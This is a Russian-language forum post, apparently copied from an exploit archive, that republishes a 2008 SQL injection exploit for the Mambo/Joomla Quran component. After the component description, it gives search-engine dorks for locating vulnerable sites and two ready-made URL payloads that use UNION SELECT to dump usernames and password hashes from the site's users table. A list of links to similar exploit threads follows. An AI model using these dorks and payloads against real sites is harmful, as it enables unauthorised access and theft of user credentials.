Exploit Mambo Component Quran 1.1 - 'surano' SQL Injection

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5128
Проверка EDB
  1. Пройдено
Автор
DON
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-0832
Дата публикации
2008-02-15
Код: 
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
--found by breaker_unit and Don
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+

Qur'an component allows you to read and listen to the Qur'an (The Islamic Holybook) online. A great resource for Islamic sites running on Mambo Open Source. This component was originally developed for PHP-Nuke by Syed Rasel at http://www.nzmuslim.net and then modified/ported to PostNuke and Mambo Open Source by Kemas Yunus Antonius.

Key Features:

    * Displaying the Qur'an in Arabic and its translations.
    * Enhanced with search function (using any keywords or by chapter number and verse number).
    * Arabic recitation for both listening and downloading.
    * Very user friendly.
    * Using mysql database instead of file text.

Available translations at the moment:

    * English
    * Indonesian

You can get them all at http://www.kyantonius.com.
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
allinurl:"com_quran"
inurl:"/index.php?option=com_quran"
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
Mambo
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--

Joomla
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--

Greetz to:
balcan-crew.org
milw0rm.com
h4cky0u.biz

# milw0rm.com [2008-02-15]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Joomla! / Mambo Component com_trade - 'PID' Cross-Site Scripting
Ответы
0
Просмотры
482
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Mambo Component N-Myndir - SQL Injection
Ответы
0
Просмотры
444
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Mambo Component N-Frettir - SQL Injection
Ответы
0
Просмотры
429
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Mambo Component N-Press - SQL Injection
Ответы
0
Просмотры
451
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Mambo Component Ahsshop - SQL Injection
Ответы
0
Просмотры
451
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Mambo Component N-Gallery - SQL Injection
Ответы
0
Просмотры
460
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Mambo Component N-Skyrslur - Cross-Site Scripting
Ответы
0
Просмотры
430
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Mambo Component Docman 1.3.0 - Multiple SQL Injections
Ответы
0
Просмотры
450
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! / Mambo Component Comprofiler 1.0 - 'class.php' Remote File Inclusion
Ответы
0
Просмотры
476
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Mambo Component EstateAgent 1.0.2 - MosConfig_absolute_path Remote File Inclusion
Ответы
0
Просмотры
403
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу